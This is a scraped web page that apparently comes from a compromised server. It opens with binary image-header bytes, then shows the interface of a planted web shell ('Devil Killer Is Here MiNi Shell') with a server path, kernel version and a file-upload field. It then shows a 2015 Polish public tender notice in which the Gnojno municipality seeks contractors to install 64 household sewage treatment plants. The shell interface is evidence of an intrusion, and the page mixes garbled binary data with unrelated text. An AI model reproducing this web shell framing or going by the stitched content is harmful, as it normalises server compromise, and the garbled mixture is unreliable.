JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150120/13524-N-2015.html

<p class="kh_header"><b>Gnojno: Uporządkowanie gospodarki wodno-ściekowej na terenie gminy Gnojno</b><br>
<b>Numer ogłoszenia: 13524 - 2015; data zamieszczenia: 20.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gnojno , Gnojno 145, 28-114 Gnojno, woj. świętokrzyskie, tel. 0413532038, faks 0413532038.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.gminy.com.pl/gnojno/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Uporządkowanie gospodarki wodno-ściekowej na terenie gminy Gnojno.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie zadania: 
 Uporządkowanie gospodarki wodno-ściekowej na terenie gminy Gnojno

Zadanie wykonywane będzie jednoetapowo. 

Przedmiotem zamówienia jest dostawa i montaż 64 sztuk przydomowych oczyszczalni ścieków pracujących w technologii SBR z rozprowadzeniem ścieków oczyszczonych poprzez drenaż wykonany z tuneli filtracyjnych lub poprzez studnie chłonne oraz w technologii złóż biologicznych zraszanych z wykorzystaniem biomasy w następujących miejscowościach: Falki, Janowice Poduszowskie, Janowice Raczyckie, Jarząbki, Poręba, Ruda, Rzeszutki, Wólka Bosowska, Zagrody. 
Dodatkowo Wykonawca będzie obowiązany do: 
obsługi geodezyjnej oraz wykonanie inwentaryzacji geodezyjnej powykonawczej dla każdej oczyszczalni, 
wykonania dokumentacji techniczno - ruchowej, instrukcji obsługi oraz raportu porealizacyjnego z zamieszczonymi wynikami w zakresie pozwalającym na stwierdzenie dotrzymania parametrów oczyszczalni ścieków, 
wykonania dokumentacji zdawczo-odbiorczej
przeprowadzenie prób końcowych w tym rozruchu oczyszczalni, 
przeszkolenie użytkowników w zakresie obsługi i konserwacji oczyszczalni, 
organizacji i zabezpieczenia placu budowy; 
uporządkowania terenu objętego placem budowy i przywrócenie do stanu pierwotnego, oraz wszelkie konieczne do wykonania roboty zgodnie z sztuką budowlaną i obowiązującymi przepisami. 

Roboty budowlano - montażowe należy prowadzić zgodnie ze sztuką budowlaną, obowiązującymi normami i przepisami BHP. 
Wszystkie zastosowane materiały i urządzenia muszą posiadać niezbędne atesty, aprobaty i deklaracje zgodności. 

Oczyszczalnie ścieków będą spełniać wymogi normy EN12566-3;2005+A1:2009. 
Wykonawca dołączy do oferty pełny raport badań (wodoszczelność, wytrzymałość, skuteczność oczyszczania (efektywność), trwałość) zgodny z przywołaną normą, wystawiony przez laboratorium notyfikowane przez Komisję Europejską które zostały wymienione w wykazie dostępnym na stronie KE 
http://ec.europa.eu/enterprise/newapproach/nando/index.cfm?fuseaction=cpd.nb_hs&hs_id=138327. 
Przez pełny raport należy rozumieć oprócz przedłożonego raportu sporządzonego przez notyfikowane laboratorium przedłożenie również wraz z nim, dokładnego opis próbek przekazanych do laboratorium celem ich przebadania wraz ze szczegółowymi rysunkami  (zbiorników, urządzeń i wyposażenia oczyszczalni), obliczeń wytrzymałościowych, opisów określających grubości ścian zbiorników komór osadników, opis technologii oczyszczania.
Raport musi odnosić się do wymaganych wskaźników tj. energochłonności oraz stopnia oczyszczania ścieków. 
Posiadanie raportu jednoznaczne jest z możliwością oznakowania wyrobu znakiem CE. 

Ponadto Zamawiający wymaga aby: 
układ sterowania oczyszczalni posiadał monitoring czasu jej pracy, 
nie dopuszcza urządzeń o charakterze prototypowym, nie występujących w obrocie, mających wartość jedynie badawczą, dlatego do wykonania zamówienia należy zaproponować urządzenia oznaczone znakiem jakości CE oraz udowodnić iż oferowane urządzenia zostały zamontowane i działają z wysoką sprawnością, 
dopuszcza się tylko zbiorniki monolityczne  z PEHD wykonane metodą rozdmuchu, rotomuldingu lub inną metodą wykonania zbiornika w tej samej lub wyższej klasie jakości zapewniającej tym samym nieprzepuszczalność wody. Nie dopuszcza się zbiorników spawanych, zgrzewanych i skręcanych z uwagi na to, że mogą ulec niekontrolowanemu rozszczelnieniu. 
wymagane maksymalne zużycie prądu w trybie normalnej pracy oczyszczalni nie może przekroczyć 0,15 kWh/ 1 RLM, 
sterownik regulujący pracę oczyszczalni w sposób automatyczny powinien posiadać następujące  parametry: odporność na zaniki prądu, funkcja zarządzania dozowaniem ścieku i recyrkulacją osadu, funkcja urlopowa, rejestrator czasu pracy.
po wykonaniu inwestycji dokonać badania co najmniej 10% losowo wybranych oczyszczalni w zakresie osiąganych parametrów przez niezależne laboratorium akredytowane
obowiązek wyceny każdej oczyszczalni przydomowej zgodnie z podziałem wskazanym w dokumentacji wraz ze szczegółowym kosztorysem ofertowym zawierającym rozbicie na każdą oczyszczalnię (lokalizacja) wymienioną w dokumentacji.
w celu potwierdzenia przez producenta wysokich standardów produkcji należy dołączyć do oferty aktualny certyfikat  DIN ISO 9001:2008  lub równoważny dokument potwierdzający wdrożenie i stosowanie równoważnego systemu jakości przy produkcji przydomowych oczyszczalni oparty na normach międzynarodowych lub europejskich. 
Wszędzie gdziekolwiek w opisie przedmiotu zamówienia wskazana została nazwa producenta, znak towarowy, patent lub pochodzenie, to wskazaniu takiemu towarzyszy wyraz lub równoważny. W przypadkach, których Zamawiający opisał przedmiot zamówienia poprzez wskazanie Polskich norm przenoszących europejskie lub innych norm, aprobat technicznych lub innych technicznych systemów odniesienia, Zamawiający dopuszcza rozwiązania równoważne. 

Zamawiający dopuszcza oferowanie materiałów, rozwiązań, urządzeń równoważnych, pod warunkiem, że gwarantują one realizację zamówienia zgodnie z projektem oraz zapewniają uzyskanie parametrów technicznych i funkcjonalno - użytkowych nie gorszych od założonych w niniejszej specyfikacji.  
Zamawiający dopuszcza możliwość złożenia oferty w oparciu o zastosowanie rozwiązań równoważnych w stosunku do zaprojektowanych i opisanych przez Zamawiającego, z zachowaniem tych samych standardów technicznych, technologicznych i jakościowych niezbędnych do prawidłowego funkcjonowania przydomowych oczyszczalni ścieków.
Wykonawca w celu udokumentowania równoważności deklarowanych oczyszczalni ścieków wraz z ofertą składa: karty katalogowe, raporty z badań, rysunki i opisy, które wykażą standardy i wymogi przydomowych oczyszczalni ścieków pracujących w technologii SBR - opisanych w przedmiocie zamówienia, oraz opisane dokumenty w części VI G niniejszej specyfikacji. Wykonawca zobowiązany jest stosować tylko takie wyroby, które spełnią wymogi opisane prawem. 

Parametry kryteria równoważności:
Zamawiający dbając o interes publiczny oczekuje od Wykonawców zaoferowania urządzeń PBOŚ posiadających określone parametry użytkowe, jakościowe oraz wysokiej jakości cechy techniczne. Oczekiwania Zamawiającego zawarte są w niżej wymienionych parametrach równoważności:
1.	 Dopuszcza się oczyszczalnie ścieków posiadające zgodność z normą PN-EN 12566-3 potwierdzone raportem zgodnym z ww. normą, wystawionym przez laboratorium notyfikowane przez Komisję Europejską oraz raportem wydanym przez jednostkę notyfikowaną przeprowadzającą badania. Raport musi zawierać wszystkie szczegółowe, wartościowe wyniki badań na zgodność z normą PN-EN 12566-3. Kompletne badania na zgodność z normą PN-EN 12566-3 muszą być wykonane wyłącznie w laboratorium notyfikowanym przez Komisję Europejską zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 11 sierpnia 2004 roku (Dz. U. Nr 195, poz. 2011). Kompletna PBOŚ musi spełniać wytyczne normy zharmonizowanej PN-EN 12566-3 - Małe oczyszczalnie ścieków dla obliczeniowej liczby mieszkańców (OLM) do 50 - Część 3: Kontenerowe i lub montowane na miejscu przydomowe oczyszczalnie ścieków i być znakowana znakiem CE. Wymaga się, aby oferta zabezpieczona była pełnym raportem z badań PBOŚ, tzn. badania: wodoszczelności, trwałości, skuteczności oczyszczania i wytrzymałości, zgodnym z normą PN-EN 12566-3, wystawionym przez jednostkę notyfikowaną w Komisji Europejskiej. Wszystkie badania na zgodność z normą PN-EN 12566-3 muszą być wykonane wyłącznie w laboratorium notyfikowanym przez Komisję Europejską zgodnie z Ustawą z dnia 16 kwietnia 2004 r. o wyrobach budowlanych (Dz. U. Nr 92, poz. 881 z późn. zm.).
2.	Technologia oczyszczania ścieków potwierdzona przez raport skuteczności oczyszczania zgodny z normą PN-EN 12566-3, wystawiony przez jednostkę notyfikowaną w Komisji Europejskiej - oczyszczalnie przydomowe w technologii SBR, czyli niskoobciążonego osadu czynnego i sekwencyjnego biologicznego oczyszczania ścieków oraz w technologii złż biologicznych zraszanych. 
3.	Dopuszcza się tylko zbiorniki monolityczne z PEHD wykonane metodą rozdmuchu lub rotomuldingu. Nie dopuszcza się zbiorników spawanych, zgrzewanych i skręcanych z uwagi na możliwość niekontrolowanego rozszczelnienia.
4.	W celu separacji części stałych zawartych w ściekach, ciąg technologiczny oczyszczalni musi składać się z dwóch oddzielnych zbiorników, z czego pierwszy powinien  spełniać rolę osadnika gnilnego, a w drugim realizowane być powinny procesy tlenowe

5.	Dla oczyszczalni pracujących w technologii SBR maksymalne zużycie prądu w trybie normalnej pracy oczyszczalni nie może przekroczyć 0,15 kWh/ 1 RLM.
 
6.	Dla oczyszczalni pracujących w technologii ze zraszanym złożem biologicznym zużycie prądu nie może przekroczyć wartości 0 kWh/d, a powierzchnia zraszana złoża biologicznego nie może być mniejsza niż 3m2.

7.	Wkład filtrów dezodoryzacyjnych powinien bazować na węglu aktywnym i musi posiadać okres sprawności minimum 2 lata bez potrzeby jego wymiany 

8.	Równoważne tunele filtracyjne muszą posiadać powierzchnię filtracji nie mniejszą od zaprojektowanych i muszą posiadać Aprobatę Techniczną uwzględniającą, że produkt ten jest dopuszczony do wykorzystania w systemach oczyszczania ścieków zarówno do rozsączania ścieków oczyszczonych jak i do doczyszczania ścieków jako drenaż w oczyszczalniach tylko z osadnikiem gnilnym

 W celu udokumentowania równoważności proponowanych oczyszczalni ścieków do przedmiotu zamówienia należy dołączyć do oferty: karty katalogowe, raporty z badań, zdjęcia, rysunki i opisy umożliwiające Zamawiającemu ocenę oferty. Wykonawca do wykonania zamówienia, zobowiązany jest stosować tylko takie wyroby budowlane, które wprowadzone zostały do obrotu na zasadach określonych w ustawie o wyrobach budowlanych.
Z uwagi, iż Zamawiający na realizację inwestycji uzyskał już wymagane odpowiednimi przepisami stosowne decyzje, Wykonawca, który zaoferuje produkty oraz urządzenia równoważne wymagające zmiany posiadanych decyzji, będzie musiał w ramach wykonania zamówienia w imieniu Zamawiającego, uzyskać powyższe decyzje własnym staraniem i kosztem, gwarantujące jednocześnie wykonanie zamówienia w terminie wynikającym z SIWZ.

Oferta nie może obejmować urządzeń o charakterze prototypowym, nie występujących w obrocie, mających wartość jedynie badawczą. Oferent musi udowodnić, iż urządzenia danego typu są zamontowane i działają prawidłowo.
 
Uwaga!
1. W przypadku, gdy w opisie zamówienia, w jakiejkolwiek części dokumentacji, rysunkach, STWiORB lub innej części SIWZ zostały wskazane znaki towarowe, patenty, pochodzenia materiałów urządzeń, dostawców, producenta, bądź przedmiot zamówienia został opisany za pomocą, norm, aprobat, specyfikacji technicznych i systemów odniesienia prosimy traktować jako informację uściślającą, które zostały użyte wyłącznie w celu przybliżenia potrzeb zamawiającego.  

2. Zaleca się aby wykonawca dokonał wizji lokalnej w miejscu budowy celem sprawdzenia warunków związanych z wykonaniem montażu przydomowych oczyszczalni, a także uzyskanie wszelkich dodatkowych informacji koniecznych do sporządzenia oferty. 

3. Wykonawca w okresie wykonywania inwestycji jest zobowiązany stosować przepisy prawa:
a) Ustawa z dnia 7 lipca 1994 r., Prawo budowlane.
b) Rozporządzenie Ministra Infrastruktury z dnia 12 kwietnia 2002 r., w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie, (dot. przydomowych oczyszczalni ścieków: § 37; § 31 ust. 1 pkt. 4; oraz § 36 ust. 2 pkt. 2).
c) Ustawa z dnia 18 lipca 2001r., Prawo wodne.
d) Rozporządzenie Ministra Środowiska z dnia 24 lipca 2006r.,  w sprawie warunków jakie należy spełnić przy wprowadzaniu ścieków do wód lub ziemi oraz w sprawie substancji szczególnie szkodliwych dla środowiska wodnego.
e) Ustawa z dnia 7 czerwca 2001r., o zbiorowym zaopatrzaniu w wodę i zbiorowym odprowadzaniu ścieków.
Szczegółowy zakres robót zawiera projekt budowlany  - załącznik nr 8 do siwz oraz specyfikacja techniczna wykonania i odbioru robót    - załącznik nr  9 do siwz..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.24.21-9, 45.11.12.00-0, 45.23.24.10-9, 45.23.24.23-3, 45.25.56.00-5, 45.23.24.00-6, 45.23.13.00-8, 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości 18.000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jedną robotę budowlaną polegającą na  budowie sieci  kanalizacyjnej, przydomowych oczyszczalni ścieków o wartości min. 800.000,00 zł brutto z podaniem daty i miejsca wykonania oraz załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.      
Dowodami o których mowa powyżej są  poświadczenia, lub - inne dokumenty - jeżeli   z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia.
Wartość podana w dokumentach w walutach innych niż wskazane przez Zamawiającego będą przeliczane według średniego kursu NBP na dzień złożenia ofert.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeśli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie niniejszego warunku należy złożyć wykaz osób, które będą uczestniczyć        w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia            i wykształcenia  niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacji o podstawie do dysponowania tymi osobami. 
Wykonawca musi wykazać, że dysponuje lub będzie dysponował: 
- kierownikiem budowy, posiadającym uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji                i urządzeń: wodociągowych i kanalizacyjnych, cieplnych, wentylacyjnych i gazowych i przynależącym do właściwej izby samorządu zawodowego, 
 - kierownikiem robót elektrycznych posiadającym uprawnienia do kierowania robotami
w specjalności instalacyjno - inżynieryjnej w zakresie instalacji elektrycznych i przynależącym do właściwej izby samorządu zawodowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie niniejszego warunku należy złożyć:
- informację z banku lub spółdzielczej kasy oszczędnościowo - kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy na kwotę 800.000,00 zł  wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert
- opłaconą polisę, a przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę - 800. 000,00 zł
Wykonawca w myśl art. 26 ust. 2b ustawy Pzp może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia,         w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby  wykonania zamówienia.
Jeżeli podmiot, o którym mowa w ust. 5 jest równocześnie podwykonawcą w rozumieniu art. 36 b ustawy pzp, w przypadku zmiany lub rezygnacji z takiego podwykonawcy wykonawca jest obowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenia zamówienia
 Podmiot, który zobowiązał się do udostępnienia zasobów na podstawie art. 26 ust. 2b ustawy  Pzp, odpowiada solidarnie z wykonawcą za szkodę zamawiającego powstałą w skutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.
Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów, o których mowa w Rozdziale VI siwz, na zasadzie: spełnia- nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

